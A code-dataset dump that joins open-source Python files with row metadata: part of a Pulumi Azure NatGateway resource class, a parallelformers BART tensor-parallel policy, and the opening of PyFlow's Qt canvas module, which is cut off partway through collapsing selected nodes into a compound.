:param pulumi.Input[pulumi.InputType['NatGatewaySkuArgs']] sku: The nat gateway SKU.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[Sequence[pulumi.Input[str]]] zones: A list of availability zones denoting the zone in which Nat Gateway should be deployed.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NatGatewayArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Nat Gateway resource.
:param str resource_name: The name of the resource.
:param NatGatewayArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NatGatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
id: Optional[pulumi.Input[str]] = None,
idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
nat_gateway_name: Optional[pulumi.Input[str]] = None,
public_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['NatGatewaySkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NatGatewayArgs.__new__(NatGatewayArgs)
__props__.__dict__["id"] = id
__props__.__dict__["idle_timeout_in_minutes"] = idle_timeout_in_minutes
__props__.__dict__["location"] = location
__props__.__dict__["nat_gateway_name"] = nat_gateway_name
__props__.__dict__["public_ip_addresses"] = public_ip_addresses
__props__.__dict__["public_ip_prefixes"] = public_ip_prefixes
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
__props__.__dict__["zones"] = zones
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["subnets"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200701:NatGateway"), pulumi.Alias(type_="azure-native:network:NatGateway"), pulumi.Alias(type_="azure-nextgen:network:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190201:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190201:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190401:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190401:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190601:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190601:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190701:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190701:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190801:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190801:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190901:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190901:NatGateway"), pulumi.Alias(type_="azure-native:network/v20191101:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20191101:NatGateway"), pulumi.Alias(type_="azure-native:network/v20191201:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20191201:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200301:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200301:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200401:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200401:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200501:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200501:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200601:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200601:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200801:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200801:NatGateway"), pulumi.Alias(type_="azure-native:network/v20201101:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20201101:NatGateway")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(NatGateway, __self__).__init__(
'azure-native:network/v20200701:NatGateway',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'NatGateway':
"""
Get an existing NatGateway resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = NatGatewayArgs.__new__(NatGatewayArgs)
__props__.__dict__["etag"] = None
__props__.__dict__["idle_timeout_in_minutes"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["public_ip_addresses"] = None
__props__.__dict__["public_ip_prefixes"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["subnets"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["zones"] = None
return NatGateway(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="idleTimeoutInMinutes")
def idle_timeout_in_minutes(self) -> pulumi.Output[Optional[int]]:
"""
The idle timeout of the nat gateway.
"""
return pulumi.get(self, "idle_timeout_in_minutes")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the NAT gateway resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publicIpAddresses")
def public_ip_addresses(self) -> pulumi.Output[Optional[Sequence['outputs.SubResourceResponse']]]:
"""
An array of public ip addresses associated with the nat gateway resource.
"""
return pulumi.get(self, "public_ip_addresses")
@property
@pulumi.getter(name="publicIpPrefixes")
def public_ip_prefixes(self) -> pulumi.Output[Optional[Sequence['outputs.SubResourceResponse']]]:
"""
An array of public ip prefixes associated with the nat gateway resource.
"""
return pulumi.get(self, "public_ip_prefixes")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the NAT gateway resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.NatGatewaySkuResponse']]:
"""
The nat gateway SKU.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def subnets(self) -> pulumi.Output[Sequence['outputs.SubResourceResponse']]:
"""
An array of references to the subnets using this nat gateway resource.
"""
return pulumi.get(self, "subnets")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def zones(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of availability zones denoting the zone in which Nat Gateway should be deployed.
"""
return pulumi.get(self, "zones")
| 47.052133 | 2,064 | 0.660707 |
acdfb2c9ada8a2dfdd6d9d881957b8e34131bb65 | 4,849 | py | Python | parallelformers/policies/bart.py | Oaklight/parallelformers | 57fc36f81734c29aaf814e092ce13681d3c28ede | [
"Apache-2.0"
] | 454 | 2021-07-18T02:51:23.000Z | 2022-03-31T04:00:53.000Z | parallelformers/policies/bart.py | Oaklight/parallelformers | 57fc36f81734c29aaf814e092ce13681d3c28ede | [
"Apache-2.0"
] | 16 | 2021-07-18T10:47:21.000Z | 2022-03-22T18:49:57.000Z | parallelformers/policies/bart.py | Oaklight/parallelformers | 57fc36f81734c29aaf814e092ce13681d3c28ede | [
"Apache-2.0"
] | 33 | 2021-07-18T04:48:28.000Z | 2022-03-14T22:16:36.000Z | # Copyright 2021 TUNiB inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from transformers.models.bart.modeling_bart import (
BartDecoderLayer,
BartEncoderLayer,
)
from parallelformers.policies.base import Layer, Policy
from parallelformers.transformers.modeling_bart import BartAttention_
from parallelformers.utils.dist_utils import AllReduceLinear
class BartEncoderPolicy(Policy):
@staticmethod
def replace_arguments(config, world_size):
return {
# 1. reduce hidden size
"self_attn.embed_dim": config.d_model // world_size,
# 2. reduce number of heads
"self_attn.num_heads": config.encoder_attention_heads // world_size,
}
@staticmethod
def replace_modules():
return {
"BartAttention": BartAttention_,
}
@staticmethod
def attn_qkv():
return [
Layer(
weight="self_attn.q_proj.weight",
bias="self_attn.q_proj.bias",
),
Layer(
weight="self_attn.k_proj.weight",
bias="self_attn.k_proj.bias",
),
Layer(
weight="self_attn.v_proj.weight",
bias="self_attn.v_proj.bias",
),
]
@staticmethod
def attn_out():
return [
Layer(
weight="self_attn.out_proj.weight",
bias="self_attn.out_proj.bias",
replace=AllReduceLinear,
),
]
@staticmethod
def mlp_in():
return [
Layer(
weight="fc1.weight",
bias="fc1.bias",
),
]
@staticmethod
def mlp_out():
return [
Layer(
weight="fc2.weight",
bias="fc2.bias",
replace=AllReduceLinear,
),
]
@staticmethod
def original_layer_class():
return BartEncoderLayer
class BartDecoderPolicy(Policy):
@staticmethod
def replace_arguments(config, world_size):
return {
# 1. reduce hidden size
"self_attn.embed_dim": config.d_model // world_size,
"encoder_attn.embed_dim": config.d_model // world_size,
# 2. reduce number of heads
"self_attn.num_heads": config.decoder_attention_heads // world_size,
"encoder_attn.num_heads": config.decoder_attention_heads // world_size,
}
@staticmethod
def replace_modules():
return {
"BartAttention": BartAttention_,
}
@staticmethod
def attn_qkv():
return [
Layer(
weight="self_attn.q_proj.weight",
bias="self_attn.q_proj.bias",
),
Layer(
weight="self_attn.k_proj.weight",
bias="self_attn.k_proj.bias",
),
Layer(
weight="self_attn.v_proj.weight",
bias="self_attn.v_proj.bias",
),
Layer(
weight="encoder_attn.q_proj.weight",
bias="encoder_attn.q_proj.bias",
),
Layer(
weight="encoder_attn.k_proj.weight",
bias="encoder_attn.k_proj.bias",
),
Layer(
weight="encoder_attn.v_proj.weight",
bias="encoder_attn.v_proj.bias",
),
]
@staticmethod
def attn_out():
return [
Layer(
weight="self_attn.out_proj.weight",
bias="self_attn.out_proj.bias",
replace=AllReduceLinear,
),
Layer(
weight="encoder_attn.out_proj.weight",
bias="encoder_attn.out_proj.bias",
replace=AllReduceLinear,
),
]
@staticmethod
def mlp_in():
return [
Layer(
weight="fc1.weight",
bias="fc1.bias",
),
]
@staticmethod
def mlp_out():
return [
Layer(
weight="fc2.weight",
bias="fc2.bias",
replace=AllReduceLinear,
),
]
@staticmethod
def original_layer_class():
return BartDecoderLayer
| 27.551136 | 83 | 0.539286 |
acdfb2ff898730e0ae32a2298681ae95d1bb6743 | 97,245 | py | Python | PyFlow/UI/Canvas/Canvas.py | liaokongVFX/PyFlow | 337462746acf087432f4dd3248e3a1349c3a3c79 | [
"Apache-2.0"
] | null | null | null | PyFlow/UI/Canvas/Canvas.py | liaokongVFX/PyFlow | 337462746acf087432f4dd3248e3a1349c3a3c79 | [
"Apache-2.0"
] | null | null | null | PyFlow/UI/Canvas/Canvas.py | liaokongVFX/PyFlow | 337462746acf087432f4dd3248e3a1349c3a3c79 | [
"Apache-2.0"
] | 1 | 2019-08-21T07:36:20.000Z | 2019-08-21T07:36:20.000Z | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from nine import str
import random
from copy import deepcopy
import json
import uuid
import weakref
from collections import Counter
from functools import partial
try:
from inspect import getfullargspec as getargspec
except:
from inspect import getargspec
from Qt import QtCore
from Qt import QtGui
from Qt import QtWidgets
from Qt.QtWidgets import *
from PyFlow.UI.EditorHistory import EditorHistory
from PyFlow.UI.Utils.stylesheet import Colors
from PyFlow.UI.Canvas.UICommon import *
from PyFlow.UI.Canvas.SelectionRect import SelectionRect
from PyFlow.UI.Canvas.UIConnection import UIConnection
from PyFlow.UI.Canvas.UINodeBase import UINodeBase
from PyFlow.UI.Canvas.UINodeBase import getUINodeInstance
from PyFlow.UI.Canvas.UINodeBase import NodeActionButtonBase
from PyFlow.UI.Canvas.UIPinBase import UIPinBase, PinGroup
from PyFlow.UI.Views.NodeBox import NodesBox
from PyFlow.UI.Canvas.AutoPanController import AutoPanController
from PyFlow.UI.UIInterfaces import IPropertiesViewSupport
from PyFlow.Core.PinBase import PinBase
from PyFlow.Core.NodeBase import NodeBase
from PyFlow.Input import InputManager, InputAction, InputActionType
from PyFlow.UI.Views.VariablesWidget import (
VARIABLE_TAG,
VARIABLE_DATA_TAG
)
from PyFlow import getRawNodeInstance
from PyFlow.Core.Common import *
from PyFlow.Packages.PyFlowBase.Nodes.commentNode import commentNode
from PyFlow.Packages.PyFlowBase.UI.UIRerouteNode import UIRerouteNode
from PyFlow.Packages.PyFlowBase.UI.UIRerouteNodeSmall import UIRerouteNodeSmall
from PyFlow.Packages.PyFlowBase import PACKAGE_NAME as PYFLOW_BASE_PACKAGE_NAME
from PyFlow.UI.Utils.stylesheet import editableStyleSheet
def getNodeInstance(jsonTemplate, canvas, parentGraph=None):
nodeClassName = jsonTemplate['type']
nodeName = jsonTemplate['name']
packageName = jsonTemplate['package']
if 'lib' in jsonTemplate:
libName = jsonTemplate['lib']
else:
libName = None
kwargs = {}
# if get var or set var, construct additional keyword arguments
if jsonTemplate['type'] in ('getVar', 'setVar'):
kwargs['var'] = canvas.graphManager.findVariableByUid(uuid.UUID(jsonTemplate['varUid']))
raw_instance = getRawNodeInstance(nodeClassName, packageName=packageName, libName=libName, **kwargs)
assert(raw_instance.packageName == packageName)
raw_instance.uid = uuid.UUID(jsonTemplate['uuid'])
assert(raw_instance is not None), "Node {0} not found in package {1}".format(nodeClassName, packageName)
instance = getUINodeInstance(raw_instance)
canvas.addNode(instance, jsonTemplate, parentGraph=parentGraph)
return instance
class SceneClass(QGraphicsScene):
def __init__(self, parent):
super(SceneClass, self).__init__(parent)
self.setItemIndexMethod(self.NoIndex)
# self.pressed_port = None
self.selectionChanged.connect(self.OnSelectionChanged)
self.tempnode = None
self.hoverItems = []
def shoutDown(self):
self.selectionChanged.disconnect()
def mousePressEvent(self, event):
# do not clear selection when panning
modifiers = event.modifiers()
# or modifiers == QtCore.Qt.ShiftModifier:
if event.button() == QtCore.Qt.RightButton:
event.accept()
return
QGraphicsScene.mousePressEvent(self, event)
def dragEnterEvent(self, event):
if event.mimeData().hasFormat('text/plain'):
event.accept()
mime = str(event.mimeData().text())
jsonData = json.loads(mime)
if VARIABLE_TAG in jsonData:
return
packageName = jsonData["package"]
nodeType = jsonData["type"]
libName = jsonData["lib"]
name = nodeType
nodeTemplate = NodeBase.jsonTemplate()
nodeTemplate['package'] = packageName
nodeTemplate['lib'] = libName
nodeTemplate['type'] = nodeType
nodeTemplate['name'] = name
nodeTemplate['x'] = event.scenePos().x()
nodeTemplate['y'] = event.scenePos().y()
nodeTemplate['meta']['label'] = nodeType
nodeTemplate['uuid'] = str(uuid.uuid4())
try:
self.tempnode.isTemp = False
self.tempnode = None
except Exception as e:
pass
self.tempnode = self.parent()._createNode(nodeTemplate)
if self.tempnode:
self.tempnode.isTemp = True
self.hoverItems = []
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasFormat('text/plain'):
event.setDropAction(QtCore.Qt.MoveAction)
event.accept()
if self.tempnode:
self.tempnode.setPos(
(self.tempnode.w / -2) + event.scenePos().x(), event.scenePos().y())
mouseRect = QtCore.QRect(QtCore.QPoint(event.scenePos().x() - 1, event.scenePos().y() - 1),
QtCore.QPoint(event.scenePos().x() + 1, event.scenePos().y() + 1))
hoverItems = self.items(mouseRect)
for item in hoverItems:
if isinstance(item, UIConnection):
valid = False
for inp in self.tempnode.UIinputs.values():
if canConnectPins(item.source()._rawPin, inp._rawPin):
valid = True
for out in self.tempnode.UIoutputs.values():
if canConnectPins(out._rawPin, item.destination()._rawPin):
valid = True
if valid:
self.hoverItems.append(item)
item.drawThick()
for item in self.hoverItems:
if item not in hoverItems:
self.hoverItems.remove(item)
if isinstance(item, UIConnection):
item.restoreThick()
else:
if isinstance(item, UIConnection):
item.drawThick()
else:
event.ignore()
def dragLeaveEvent(self, event):
if self.tempnode:
self.tempnode._rawNode.kill()
self.tempnode = None
event.accept()
def OnSelectionChanged(self):
pass
def createVariableGetter(self):
pass
def dropEvent(self, event):
x = event.scenePos().x()
y = event.scenePos().y()
if event.mimeData().hasFormat('text/plain'):
jsonData = json.loads(event.mimeData().text())
# try load mime data text as json
# in case if it is a variable
# if no keyboard modifires create context menu with two actions
# for creating getter or setter
# if control - create getter, if alt - create setter
if VARIABLE_TAG in jsonData:
modifiers = event.modifiers()
varData = jsonData[VARIABLE_DATA_TAG]
nodeTemplate = NodeBase.jsonTemplate()
nodeTemplate['name'] = varData['name']
nodeTemplate['x'] = x
nodeTemplate['y'] = y
nodeTemplate['package'] = PYFLOW_BASE_PACKAGE_NAME
if modifiers == QtCore.Qt.NoModifier:
nodeTemplate['type'] = 'getVar'
nodeTemplate['meta']['label'] = varData['name']
# node uid should be unique, different from var
nodeTemplate['uuid'] = str(uuid.uuid4())
nodeTemplate['varUid'] = varData['uuid']
m = QMenu()
getterAction = m.addAction('Get')
def varGetterCreator():
n = self.parent().createNode(nodeTemplate)
n.updateNodeShape()
getterAction.triggered.connect(varGetterCreator)
setNodeTemplate = dict(nodeTemplate)
setterAction = m.addAction('Set')
setNodeTemplate['type'] = 'setVar'
setterAction.triggered.connect(lambda: self.parent().createNode(setNodeTemplate))
m.exec_(QtGui.QCursor.pos(), None)
if modifiers == QtCore.Qt.ControlModifier:
nodeTemplate['type'] = 'getVar'
# node uid should be unique, different from var
nodeTemplate['uuid'] = str(uuid.uuid4())
nodeTemplate['varUid'] = varData['uuid']
nodeTemplate['meta']['label'] = varData['name']
self.parent().createNode(nodeTemplate)
return
if modifiers == QtCore.Qt.AltModifier:
nodeTemplate['type'] = 'setVar'
nodeTemplate['uuid'] = str(uuid.uuid4())
nodeTemplate['varUid'] = varData['uuid']
nodeTemplate['meta']['label'] = varData['name']
self.parent().createNode(nodeTemplate)
return
else:
packageName = jsonData["package"]
nodeType = jsonData["type"]
libName = jsonData['lib']
name = nodeType
dropItem = self.parent().nodeFromInstance(self.itemAt(event.scenePos(), QtGui.QTransform()))
if not dropItem or (isinstance(dropItem, UINodeBase) and dropItem.isCommentNode or dropItem.isTemp) or isinstance(dropItem, UIPinBase) or isinstance(dropItem, UIConnection):
nodeTemplate = NodeBase.jsonTemplate()
nodeTemplate['package'] = packageName
nodeTemplate['lib'] = libName
nodeTemplate['type'] = nodeType
nodeTemplate['name'] = name
nodeTemplate['x'] = x
nodeTemplate['y'] = y
nodeTemplate['meta']['label'] = nodeType
nodeTemplate['uuid'] = str(uuid.uuid4())
if self.tempnode:
self.tempnode.updateOwningCommentNode()
self.tempnode.isTemp = False
self.tempnode.update()
node = self.tempnode
self.tempnode = None
for it in self.items(event.scenePos()):
if isinstance(it, UIPinBase):
dropItem = it
break
elif isinstance(it, UIConnection):
dropItem = it
break
EditorHistory().saveState("Create node {}".format(node.name), modify=True)
else:
node = self.parent().createNode(nodeTemplate)
nodeInputs = node.namePinInputsMap
nodeOutputs = node.namePinOutputsMap
if isinstance(dropItem, UIPinBase):
node.setPos(x - node.boundingRect().width(), y)
for inp in nodeInputs.values():
if canConnectPins(dropItem._rawPin, inp._rawPin):
if dropItem.isExec():
dropItem._rawPin.disconnectAll()
self.parent().connectPins(dropItem, inp)
node.setPos(x + node.boundingRect().width(), y)
break
for out in nodeOutputs.values():
if canConnectPins(out._rawPin, dropItem._rawPin):
self.parent().connectPins(out, dropItem)
node.setPos(x - node.boundingRect().width(), y)
break
if isinstance(dropItem, UIConnection):
for inp in nodeInputs.values():
if canConnectPins(dropItem.source()._rawPin, inp._rawPin):
if dropItem.source().isExec():
dropItem.source()._rawPin.disconnectAll()
self.parent().connectPins(dropItem.source(), inp)
break
for out in nodeOutputs.values():
if canConnectPins(out._rawPin, dropItem.destination()._rawPin):
self.parent().connectPins(out, dropItem.destination())
break
else:
super(SceneClass, self).dropEvent(event)
class Canvas(QGraphicsView):
"""UI canvas class
"""
_manipulationMode = CanvasManipulationMode.NONE
_realTimeLineInvalidPen = Colors.Red
_realTimeLineNormalPen = Colors.White
_realTimeLineValidPen = Colors.Green
_mouseWheelZoomRate = 0.0005
requestFillProperties = QtCore.Signal(object)
requestClearProperties = QtCore.Signal()
# argument is a list of ui nodes
requestShowSearchResults = QtCore.Signal(object)
USETAB = True
def __init__(self, graphManager, pyFlowInstance=None):
super(Canvas, self).__init__()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.menu = QMenu()
self.populateMenu()
self.state = CanvasState.DEFAULT
self.graphManager = graphManager
self.graphManager.graphChanged.connect(self.onGraphChanged)
self.pyFlowInstance = pyFlowInstance
# connect with App class signals
self.pyFlowInstance.newFileExecuted.connect(self.onNewFile)
self.setScene(SceneClass(self))
self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.pressed_item = None
self.pressedPin = None
self.released_item = None
self.resizing = False
self.hoverItems = []
self.hoveredRerutes = []
self.bPanMode = False
self._isPanning = False
self._mousePressed = False
self._shadows = False
self._panSpeed = 1.0
self._minimum_scale = 0.2
self._maximum_scale = 3.0
self.setViewportUpdateMode(QGraphicsView.FullViewportUpdate)
self.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)
# Antialias -- Change to Settings
self.setRenderHint(QtGui.QPainter.Antialiasing)
self.setRenderHint(QtGui.QPainter.TextAntialiasing)
##
self.setAcceptDrops(True)
self.setAttribute(QtCore.Qt.WA_AlwaysShowToolTips)
self.setResizeAnchor(QGraphicsView.AnchorUnderMouse)
self.scene().setSceneRect(QtCore.QRectF(0, 0, 10, 10))
self.factor = 1
self.realTimeLine = QGraphicsPathItem(None, self.scene())
self.realTimeLine.name = 'RealTimeLine'
self.realTimeLineInvalidPen = QtGui.QPen(self._realTimeLineInvalidPen, 2.0, QtCore.Qt.SolidLine)
self.realTimeLineNormalPen = QtGui.QPen(self._realTimeLineNormalPen, 2.0, QtCore.Qt.DashLine)
self.realTimeLineValidPen = QtGui.QPen(self._realTimeLineValidPen, 2.0, QtCore.Qt.SolidLine)
self.realTimeLine.setPen(self.realTimeLineNormalPen)
self.mousePressPose = QtCore.QPointF(0, 0)
self.mousePos = QtCore.QPointF(0, 0)
self._lastMousePos = QtCore.QPointF(0, 0)
self._right_button = False
self._drawRealtimeLine = False
self._update_items = False
self._resize_group_mode = False
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.centerOn(QtCore.QPointF(self.sceneRect().width() /
2, self.sceneRect().height() / 2))
self.initialScrollBarsPos = QtGui.QVector2D(
self.horizontalScrollBar().value(), self.verticalScrollBar().value())
self._sortcuts_enabled = True
self.current_rounded_pos = QtCore.QPointF(0.0, 0.0)
self.autoPanController = AutoPanController()
self._bRightBeforeShoutDown = False
self.node_box = NodesBox(self.getApp(), self, bUseDragAndDrop=True)
self.node_box.setWindowFlags(QtCore.Qt.Window | QtCore.Qt.FramelessWindowHint)
self.codeEditors = {}
self._UIConnections = {}
self.boundingRect = self.rect()
if self.USETAB:
self.installEventFilter(self)
self.reconnectingWires = set()
self.currentPressedKey = None
self.dropCallback = None
def getApp(self):
return self.pyFlowInstance
def onGraphChanged(self, newGraph):
for node in self.nodes.values():
bVisible = node._rawNode.graph() == newGraph
node.setVisible(bVisible)
for pin in node.UIPins.values():
for connection in pin.uiConnectionList:
if bVisible:
if not connection.isUnderCollapsedComment():
connection.setVisible(bVisible)
else:
connection.setVisible(bVisible)
self.validateCommentNodesOwnership(newGraph)
for commentNode in newGraph.getNodesList():
uiCommentNode = commentNode.getWrapper()
if uiCommentNode.isCommentNode:
if uiCommentNode.collapsed:
uiCommentNode.hideOwningNodes()
self.validateConnections(newGraph)
def nodeShapeUpdater():
for node in self.nodes.values():
node.updateNodeShape()
QtCore.QTimer.singleShot(100, nodeShapeUpdater)
def jumpToNode(self, uiNode):
self.graphManager.selectGraph(uiNode.graph())
self.clearSelection()
uiNode.setSelected(True)
self.frameSelectedNodes()
@property
def manipulationMode(self):
return self._manipulationMode
@manipulationMode.setter
def manipulationMode(self, value):
self._manipulationMode = value
if value == CanvasManipulationMode.NONE:
pass
elif value == CanvasManipulationMode.SELECT:
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
elif value == CanvasManipulationMode.PAN:
self.viewport().setCursor(QtCore.Qt.OpenHandCursor)
elif value == CanvasManipulationMode.MOVE:
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
elif value == CanvasManipulationMode.ZOOM:
self.viewport().setCursor(QtCore.Qt.SizeHorCursor)
elif value == CanvasManipulationMode.COPY:
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
def setSelectedNodesCollapsed(self, collapsed=True):
for node in self.selectedNodes():
node.collapsed = collapsed
def collapseSelectedNodesToCompound(self):
selectedNodes = self.selectedNodes()
if len(selectedNodes) == 0:
return
selectedNodesRect = self.getNodesRect(True, True)
wires = list()
for node in selectedNodes:
for pin in node.UIPins.values():
wires.extend(pin.uiConnectionList)
inputPins = list()
inputConectionList = dict()
outputPins = list()
outputConectionList = dict()
for wire in wires:
if wire.source().owningNode().isSelected() and not wire.destination().owningNode().isSelected():
if wire.destination() not in outputPins:
outputPins.append(wire.destination())
outputConectionList[wire.destination()] = [[wire.source().owningNode().name, wire.source().name]]
else:
outputConectionList[wire.destination()].append([wire.source().owningNode().name, wire.source().name])
if not wire.source().owningNode().isSelected() and wire.destination().owningNode().isSelected():
if wire.source() not in inputPins:
inputPins.append(wire.source())
inputConectionList[wire.source()] = [[wire.destination().owningNode().name, wire.destination().name]]
else:
inputConectionList[wire.source()].append([wire.destination().owningNode().name, wire.destination().name])
nodes = self.copyNodes(toClipBoard=False)
for node in selectedNodes:
node._rawNode.kill()
compoundTemplate = NodeBase.jsonTemplate()
compoundTemplate['package'] = 'PyFlowBase'
compoundTemplate['type'] = 'compound'
compoundTemplate['name'] = 'compound'
compoundTemplate['uuid'] = str(uuid.uuid4())
compoundTemplate['meta']['label'] = 'compound'
compoundTemplate['x'] = selectedNodesRect.center().x()
compoundTemplate['y'] = selectedNodesRect.center().y()
uiCompoundNode = self._createNode(compoundTemplate)
activeGraphName = self.graphManager.activeGraph().name
uiCompoundNode.stepIn()
self.pasteNodes(data=nodes, move=False)
newInputPins = dict()
newOutputPins = dict()
if len(inputPins) > 0:
graphInputsTemplate = NodeBase.jsonTemplate()
graphInputsTemplate['package'] = 'PyFlowBase'
graphInputsTemplate['type'] = 'graphInputs'
graphInputsTemplate['name'] = 'graphInputs'
graphInputsTemplate['uuid'] = str(uuid.uuid4())
graphInputsTemplate['meta']['label'] = 'graphInputs'
graphInputsTemplate['x'] = selectedNodesRect.left() - 100
graphInputsTemplate['y'] = selectedNodesRect.center().y()
graphInputs = self._createNode(graphInputsTemplate)
for o in inputPins:
newPinName = self.graphManager.getUniqName(o.owningNode().name)
newPin = graphInputs.onAddOutPin(newPinName, o.dataType)
newInputPins[o] = newPin
for n in inputConectionList[o]:
node = self.findNode(n[0])
self.connectPinsInternal(newPin, node.getPinSG(n[1]))
if len(outputPins) > 0:
graphOutputsTemplate = NodeBase.jsonTemplate()
graphOutputsTemplate['package'] = 'PyFlowBase'
graphOutputsTemplate['type'] = 'graphOutputs'
graphOutputsTemplate['name'] = 'graphOutputs'
graphOutputsTemplate['uuid'] = str(uuid.uuid4())
graphOutputsTemplate['meta']['label'] = 'graphOutputs'
graphOutputsTemplate['x'] = selectedNodesRect.right() + 100
graphOutputsTemplate['y'] = selectedNodesRect.center().y()
graphOutputs = self._createNode(graphOutputsTemplate)
